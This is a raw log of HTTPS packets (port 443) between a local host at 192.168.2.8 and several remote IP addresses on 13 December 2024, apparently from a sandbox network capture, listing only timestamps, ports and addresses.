Dec 13, 2024 08:45:18.495704889 CET	49738	443	192.168.2.8	104.26.12.205
Dec 13, 2024 08:45:18.495755911 CET	443	49738	104.26.12.205	192.168.2.8
Dec 13, 2024 08:45:18.495819092 CET	49738	443	192.168.2.8	104.26.12.205
Dec 13, 2024 08:45:18.497298956 CET	49738	443	192.168.2.8	104.26.12.205
Dec 13, 2024 08:45:18.497312069 CET	443	49738	104.26.12.205	192.168.2.8
Dec 13, 2024 08:45:19.586755037 CET	443	49737	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:19.587212086 CET	49737	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:19.587239981 CET	443	49737	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:19.588236094 CET	443	49737	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:19.588341951 CET	49737	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:19.589555979 CET	49737	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:19.589709997 CET	49737	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:19.707490921 CET	443	49738	104.26.12.205	192.168.2.8
Dec 13, 2024 08:45:19.708236933 CET	49738	443	192.168.2.8	104.26.12.205
Dec 13, 2024 08:45:19.708259106 CET	443	49738	104.26.12.205	192.168.2.8
Dec 13, 2024 08:45:19.709357977 CET	443	49738	104.26.12.205	192.168.2.8
Dec 13, 2024 08:45:19.709428072 CET	49738	443	192.168.2.8	104.26.12.205
Dec 13, 2024 08:45:19.711070061 CET	49738	443	192.168.2.8	104.26.12.205
Dec 13, 2024 08:45:19.711256027 CET	443	49738	104.26.12.205	192.168.2.8
Dec 13, 2024 08:45:19.711265087 CET	49738	443	192.168.2.8	104.26.12.205
Dec 13, 2024 08:45:19.711319923 CET	49738	443	192.168.2.8	104.26.12.205
Dec 13, 2024 08:45:19.712743998 CET	49739	443	192.168.2.8	45.112.123.126
Dec 13, 2024 08:45:19.712791920 CET	443	49739	45.112.123.126	192.168.2.8
Dec 13, 2024 08:45:19.712882996 CET	49739	443	192.168.2.8	45.112.123.126
Dec 13, 2024 08:45:19.713269949 CET	49739	443	192.168.2.8	45.112.123.126
Dec 13, 2024 08:45:19.713279009 CET	443	49739	45.112.123.126	192.168.2.8
Dec 13, 2024 08:45:19.794662952 CET	49740	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:19.794723034 CET	443	49740	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:19.794964075 CET	49740	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:19.795360088 CET	49740	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:19.795372963 CET	443	49740	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:21.009890079 CET	443	49740	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:21.011132002 CET	49740	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:21.011161089 CET	443	49740	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:21.012343884 CET	443	49740	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:21.012401104 CET	49740	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:21.013871908 CET	49740	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:21.013998985 CET	49740	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:21.015289068 CET	49741	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:21.015351057 CET	443	49741	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:21.015413046 CET	49741	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:21.015779018 CET	49741	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:21.015789986 CET	443	49741	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:21.103698969 CET	443	49739	45.112.123.126	192.168.2.8
Dec 13, 2024 08:45:21.104350090 CET	49739	443	192.168.2.8	45.112.123.126
Dec 13, 2024 08:45:21.104372978 CET	443	49739	45.112.123.126	192.168.2.8
Dec 13, 2024 08:45:21.105365038 CET	443	49739	45.112.123.126	192.168.2.8
Dec 13, 2024 08:45:21.105439901 CET	49739	443	192.168.2.8	45.112.123.126
Dec 13, 2024 08:45:21.106959105 CET	49739	443	192.168.2.8	45.112.123.126
Dec 13, 2024 08:45:21.107083082 CET	443	49739	45.112.123.126	192.168.2.8
Dec 13, 2024 08:45:21.107136965 CET	49739	443	192.168.2.8	45.112.123.126
Dec 13, 2024 08:45:21.107188940 CET	49739	443	192.168.2.8	45.112.123.126
Dec 13, 2024 08:45:21.108458042 CET	49742	443	192.168.2.8	159.89.102.253
Dec 13, 2024 08:45:21.108495951 CET	443	49742	159.89.102.253	192.168.2.8
Dec 13, 2024 08:45:21.108963013 CET	49742	443	192.168.2.8	159.89.102.253
Dec 13, 2024 08:45:21.108963013 CET	49742	443	192.168.2.8	159.89.102.253
Dec 13, 2024 08:45:21.108992100 CET	443	49742	159.89.102.253	192.168.2.8
Dec 13, 2024 08:45:22.226578951 CET	443	49741	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:22.229429960 CET	49741	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:22.229456902 CET	443	49741	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:22.230576992 CET	443	49741	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:22.230640888 CET	49741	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:22.232438087 CET	49741	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:22.232598066 CET	49741	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:22.233647108 CET	49743	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:22.233676910 CET	443	49743	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:22.235018015 CET	49743	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:22.235344887 CET	49743	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:22.235356092 CET	443	49743	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:23.312601089 CET	443	49742	159.89.102.253	192.168.2.8
Dec 13, 2024 08:45:23.313247919 CET	49742	443	192.168.2.8	159.89.102.253
Dec 13, 2024 08:45:23.313265085 CET	443	49742	159.89.102.253	192.168.2.8
Dec 13, 2024 08:45:23.314349890 CET	443	49742	159.89.102.253	192.168.2.8
Dec 13, 2024 08:45:23.314433098 CET	49742	443	192.168.2.8	159.89.102.253
Dec 13, 2024 08:45:23.315732956 CET	49742	443	192.168.2.8	159.89.102.253
Dec 13, 2024 08:45:23.315885067 CET	49742	443	192.168.2.8	159.89.102.253
Dec 13, 2024 08:45:23.577619076 CET	49746	443	192.168.2.8	31.14.70.245
Dec 13, 2024 08:45:23.577687025 CET	443	49746	31.14.70.245	192.168.2.8
Dec 13, 2024 08:45:23.577779055 CET	49746	443	192.168.2.8	31.14.70.245
Dec 13, 2024 08:45:23.588268995 CET	49746	443	192.168.2.8	31.14.70.245
Dec 13, 2024 08:45:23.588285923 CET	443	49746	31.14.70.245	192.168.2.8
Dec 13, 2024 08:45:23.588601112 CET	49747	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:23.588649988 CET	443	49747	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:23.588717937 CET	49747	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:23.589179993 CET	49747	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:23.589189053 CET	443	49747	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:23.878509045 CET	443	49743	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:23.879138947 CET	49743	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:23.879164934 CET	443	49743	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:23.880326986 CET	443	49743	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:23.880394936 CET	49743	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:23.881562948 CET	49743	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:23.881715059 CET	49743	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:23.882868052 CET	49748	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:23.882905006 CET	443	49748	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:23.882981062 CET	49748	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:23.885154963 CET	49748	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:23.885166883 CET	443	49748	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:24.808979988 CET	443	49747	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:24.811471939 CET	49747	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:24.811506987 CET	443	49747	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:24.812566042 CET	443	49747	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:24.812639952 CET	49747	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:24.813606024 CET	49747	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:24.813740015 CET	443	49747	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:24.813747883 CET	49747	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:24.813782930 CET	49747	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:24.814892054 CET	49749	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:24.814939976 CET	443	49749	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:24.815013885 CET	49749	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:24.815387964 CET	49749	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:24.815398932 CET	443	49749	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:24.956384897 CET	443	49746	31.14.70.245	192.168.2.8
Dec 13, 2024 08:45:24.956527948 CET	49746	443	192.168.2.8	31.14.70.245
Dec 13, 2024 08:45:24.958184004 CET	49746	443	192.168.2.8	31.14.70.245
Dec 13, 2024 08:45:24.958199024 CET	443	49746	31.14.70.245	192.168.2.8
Dec 13, 2024 08:45:24.958451986 CET	443	49746	31.14.70.245	192.168.2.8
Dec 13, 2024 08:45:24.961360931 CET	49746	443	192.168.2.8	31.14.70.245
Dec 13, 2024 08:45:24.961416006 CET	49746	443	192.168.2.8	31.14.70.245
Dec 13, 2024 08:45:24.961437941 CET	443	49746	31.14.70.245	192.168.2.8
Dec 13, 2024 08:45:25.094325066 CET	443	49748	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:25.094980001 CET	49748	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:25.095005035 CET	443	49748	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:25.096115112 CET	443	49748	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:25.096184015 CET	49748	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:25.097413063 CET	49748	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:25.097595930 CET	49748	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:25.098671913 CET	49750	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:25.098712921 CET	443	49750	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:25.103039980 CET	49750	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:25.103447914 CET	49750	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:25.103466988 CET	443	49750	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:25.546799898 CET	443	49746	31.14.70.245	192.168.2.8
Dec 13, 2024 08:45:25.546889067 CET	443	49746	31.14.70.245	192.168.2.8
Dec 13, 2024 08:45:25.546982050 CET	49746	443	192.168.2.8	31.14.70.245
Dec 13, 2024 08:45:25.553740978 CET	49746	443	192.168.2.8	31.14.70.245
Dec 13, 2024 08:45:25.553766966 CET	443	49746	31.14.70.245	192.168.2.8
Dec 13, 2024 08:45:25.780857086 CET	49753	443	192.168.2.8	31.14.70.245
Dec 13, 2024 08:45:25.780904055 CET	443	49753	31.14.70.245	192.168.2.8
Dec 13, 2024 08:45:25.780978918 CET	49753	443	192.168.2.8	31.14.70.245
Dec 13, 2024 08:45:25.802753925 CET	49753	443	192.168.2.8	31.14.70.245
Dec 13, 2024 08:45:25.802783012 CET	443	49753	31.14.70.245	192.168.2.8
Dec 13, 2024 08:45:26.027184963 CET	443	49749	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:26.027961969 CET	49749	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:26.027998924 CET	443	49749	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:26.029058933 CET	443	49749	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:26.029148102 CET	49749	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:26.030129910 CET	49749	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:26.030276060 CET	443	49749	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:26.030283928 CET	49749	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:26.030332088 CET	49749	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:26.031330109 CET	49754	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:26.031379938 CET	443	49754	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:26.031462908 CET	49754	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:26.031774044 CET	49754	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:26.031791925 CET	443	49754	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:26.313389063 CET	443	49750	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:26.313935041 CET	49750	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:26.313968897 CET	443	49750	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:26.315049887 CET	443	49750	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:26.315115929 CET	49750	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:26.316174984 CET	49750	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:26.316333055 CET	49750	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:26.318145990 CET	49755	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:26.318188906 CET	443	49755	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:26.318281889 CET	49755	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:26.318667889 CET	49755	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:26.318679094 CET	443	49755	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:27.193507910 CET	443	49753	31.14.70.245	192.168.2.8
Dec 13, 2024 08:45:27.193644047 CET	49753	443	192.168.2.8	31.14.70.245
Dec 13, 2024 08:45:27.195250988 CET	49753	443	192.168.2.8	31.14.70.245
Dec 13, 2024 08:45:27.195257902 CET	443	49753	31.14.70.245	192.168.2.8
Dec 13, 2024 08:45:27.195470095 CET	443	49753	31.14.70.245	192.168.2.8
Dec 13, 2024 08:45:27.198402882 CET	49753	443	192.168.2.8	31.14.70.245
Dec 13, 2024 08:45:27.198402882 CET	49753	443	192.168.2.8	31.14.70.245
Dec 13, 2024 08:45:27.198415041 CET	443	49753	31.14.70.245	192.168.2.8
Dec 13, 2024 08:45:27.240647078 CET	443	49754	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:27.241180897 CET	49754	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:27.241210938 CET	443	49754	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:27.242206097 CET	443	49754	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:27.242281914 CET	49754	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:27.243233919 CET	49754	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:27.243376017 CET	443	49754	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:27.243400097 CET	49754	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:27.243426085 CET	49754	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:27.244554043 CET	49756	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:27.244601965 CET	443	49756	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:27.244672060 CET	49756	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:27.245055914 CET	49756	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:27.245068073 CET	443	49756	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:27.528378010 CET	443	49755	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:27.529162884 CET	49755	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:27.529181004 CET	443	49755	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:27.530213118 CET	443	49755	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:27.530288935 CET	49755	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:27.532790899 CET	49757	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:27.532841921 CET	443	49757	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:27.532926083 CET	49757	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:27.533096075 CET	49755	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:27.533096075 CET	49755	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:27.533276081 CET	49757	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:27.533287048 CET	443	49757	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:27.913860083 CET	443	49753	31.14.70.245	192.168.2.8
Dec 13, 2024 08:45:27.913938999 CET	443	49753	31.14.70.245	192.168.2.8
Dec 13, 2024 08:45:27.918971062 CET	49753	443	192.168.2.8	31.14.70.245
Dec 13, 2024 08:45:27.926343918 CET	49753	443	192.168.2.8	31.14.70.245
Dec 13, 2024 08:45:27.926390886 CET	443	49753	31.14.70.245	192.168.2.8
Dec 13, 2024 08:45:28.183547974 CET	49760	443	192.168.2.8	31.14.70.245
Dec 13, 2024 08:45:28.183614016 CET	443	49760	31.14.70.245	192.168.2.8
Dec 13, 2024 08:45:28.183712959 CET	49760	443	192.168.2.8	31.14.70.245
Dec 13, 2024 08:45:28.193793058 CET	49760	443	192.168.2.8	31.14.70.245
Dec 13, 2024 08:45:28.193826914 CET	443	49760	31.14.70.245	192.168.2.8
Dec 13, 2024 08:45:28.454509020 CET	443	49756	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:28.461921930 CET	49756	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:28.461973906 CET	443	49756	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:28.463028908 CET	443	49756	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:28.463121891 CET	49756	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:28.478566885 CET	49756	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:28.478734016 CET	443	49756	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:28.478812933 CET	49756	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:28.482821941 CET	49756	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:28.499085903 CET	49761	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:28.499140978 CET	443	49761	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:28.499249935 CET	49761	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:28.503555059 CET	49761	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:28.503567934 CET	443	49761	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:28.748461008 CET	443	49757	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:28.751283884 CET	49757	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:28.751318932 CET	443	49757	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:28.752342939 CET	443	49757	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:28.752405882 CET	49757	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:28.753942013 CET	49757	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:28.754072905 CET	443	49757	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:28.754082918 CET	49757	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:28.754117966 CET	49757	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:28.755167007 CET	49762	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:28.755230904 CET	443	49762	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:28.755302906 CET	49762	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:28.755641937 CET	49762	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:28.755654097 CET	443	49762	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:29.573647022 CET	443	49760	31.14.70.245	192.168.2.8
Dec 13, 2024 08:45:29.573719978 CET	49760	443	192.168.2.8	31.14.70.245
Dec 13, 2024 08:45:29.575428963 CET	49760	443	192.168.2.8	31.14.70.245
Dec 13, 2024 08:45:29.575440884 CET	443	49760	31.14.70.245	192.168.2.8
Dec 13, 2024 08:45:29.576128006 CET	443	49760	31.14.70.245	192.168.2.8
Dec 13, 2024 08:45:29.578440905 CET	49760	443	192.168.2.8	31.14.70.245
Dec 13, 2024 08:45:29.578496933 CET	49760	443	192.168.2.8	31.14.70.245
Dec 13, 2024 08:45:29.578519106 CET	443	49760	31.14.70.245	192.168.2.8
Dec 13, 2024 08:45:29.715050936 CET	443	49761	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:29.715945005 CET	49761	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:29.715976954 CET	443	49761	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:29.717084885 CET	443	49761	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:29.717175007 CET	49761	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:29.718399048 CET	49761	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:29.718578100 CET	49761	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:29.718588114 CET	443	49761	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:29.718647003 CET	49761	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:29.719974995 CET	49763	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:29.720016956 CET	443	49763	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:29.720092058 CET	49763	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:29.720503092 CET	49763	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:29.720513105 CET	443	49763	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:29.964735031 CET	443	49762	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:29.965774059 CET	49762	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:29.965795994 CET	443	49762	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:29.966775894 CET	443	49762	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:29.966849089 CET	49762	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:29.967900038 CET	49762	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:29.968038082 CET	443	49762	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:29.968056917 CET	49762	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:29.968091965 CET	49762	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:30.426659107 CET	443	49760	31.14.70.245	192.168.2.8
Dec 13, 2024 08:45:30.426742077 CET	443	49760	31.14.70.245	192.168.2.8
Dec 13, 2024 08:45:30.426979065 CET	49760	443	192.168.2.8	31.14.70.245
Dec 13, 2024 08:45:30.442485094 CET	49760	443	192.168.2.8	31.14.70.245
Dec 13, 2024 08:45:30.442511082 CET	443	49760	31.14.70.245	192.168.2.8
Dec 13, 2024 08:45:30.940113068 CET	443	49763	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:30.940577030 CET	49763	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:30.940608978 CET	443	49763	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:30.943878889 CET	443	49763	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:30.943934917 CET	49763	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:30.945041895 CET	49763	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:30.945187092 CET	49763	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:30.946871996 CET	49764	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:30.946921110 CET	443	49764	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:30.946990967 CET	49764	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:30.947360039 CET	49764	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:30.947379112 CET	443	49764	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:31.894850016 CET	49765	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:31.894902945 CET	443	49765	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:31.894974947 CET	49765	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:31.895513058 CET	49765	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:31.895524979 CET	443	49765	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:32.158108950 CET	443	49764	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:32.158559084 CET	49764	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:32.158576012 CET	443	49764	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:32.159694910 CET	443	49764	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:32.159749985 CET	49764	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:32.161231041 CET	49764	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:32.161401033 CET	443	49764	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:32.161417961 CET	49764	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:32.161441088 CET	49764	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:32.162471056 CET	49766	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:32.162497044 CET	443	49766	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:32.162554026 CET	49766	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:32.162903070 CET	49766	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:32.162914038 CET	443	49766	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:33.111895084 CET	443	49765	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:33.113279104 CET	49765	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:33.113306046 CET	443	49765	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:33.114375114 CET	443	49765	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:33.114443064 CET	49765	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:33.115515947 CET	49765	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:33.115674019 CET	49765	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:33.116688013 CET	49767	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:33.116722107 CET	443	49767	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:33.117022038 CET	49767	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:33.117363930 CET	49767	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:33.117373943 CET	443	49767	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:33.372749090 CET	443	49766	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:33.375524998 CET	49766	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:33.375551939 CET	443	49766	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:33.376602888 CET	443	49766	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:33.376673937 CET	49766	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:33.377645016 CET	49766	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:33.377804995 CET	49766	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:34.327023029 CET	443	49767	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:34.332154989 CET	49767	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:34.332182884 CET	443	49767	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:34.333430052 CET	443	49767	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:34.333501101 CET	49767	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:34.352619886 CET	49767	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:34.352921009 CET	443	49767	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:34.353107929 CET	49767	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:34.356607914 CET	49767	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:34.379471064 CET	49768	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:34.379518986 CET	443	49768	162.159.138.232	192.168.2.8
Dec 13, 2024 08:45:34.379626989 CET	49768	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:34.383824110 CET	49768	443	192.168.2.8	162.159.138.232
Dec 13, 2024 08:45:34.383838892 CET	443	49768	162.159.138.232	192.168.2.8
